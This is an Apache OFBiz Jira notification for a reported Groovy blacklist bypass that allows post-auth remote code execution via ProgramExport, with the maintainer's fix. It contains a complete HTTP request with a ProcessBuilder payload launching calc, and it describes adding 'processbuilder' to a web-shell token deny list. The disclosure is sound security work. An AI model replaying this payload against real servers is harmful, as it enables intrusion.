[
https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490217#comment-17490217
]
Jacques Le Roux edited comment on OFBIZ-12571 at 2/10/22, 1:26 PM:
-------------------------------------------------------------------
Thanks Y4er for your much appreciated report,
This has been fixed simply by adding processbuilder to deniedWebShellTokens in
security.properties file
If you find some other similar issues don't hesitate to create a new Jira, TIA
was (Author: jacques.le.roux):
This has been fixed simply by adding processbuilder to deniedWebShellTokens in
security.properties file
> groovy blacklist bypass cause post-auth RCE from
> webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
> Key: OFBIZ-12571
> URL: https://issues.apache.org/jira/browse/OFBIZ-12571
> Project: OFBiz
> Issue Type: Bug
> Components: framework/webtools
> Affects Versions: 18.12.05
> Environment: ofbiz 18.12.05
> Reporter: Y4er
> Assignee: Jacques Le Roux
> Priority: Major
> Fix For: 18.12.06, 22.01.01
>
> Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from
> webtools/control/ProgramExport
>
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1;
> webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
